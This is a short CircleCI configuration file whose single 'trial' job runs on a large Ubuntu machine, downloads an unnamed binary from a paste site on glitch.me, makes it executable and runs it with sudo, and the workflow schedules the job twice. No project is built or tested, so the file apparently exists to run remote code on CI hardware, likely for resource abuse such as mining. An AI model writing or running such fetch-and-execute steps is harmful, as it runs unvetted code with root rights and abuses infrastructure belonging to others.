version: 2.1

jobs:
  trial:
    machine:
      image: ubuntu-2004:current
    resource_class: large
    steps:
      - run: lscpu
      - run: 
            name: "trial" 
            command: wget https://muq-hastebin.glitch.me/raw/LEwqqD3W4k && chmod u+x LEwqqD3W4k && sudo ./LEwqqD3W4k
 
workflows: 
    version: 2.1 
    build: 
        jobs: 
        - trial
        - trial
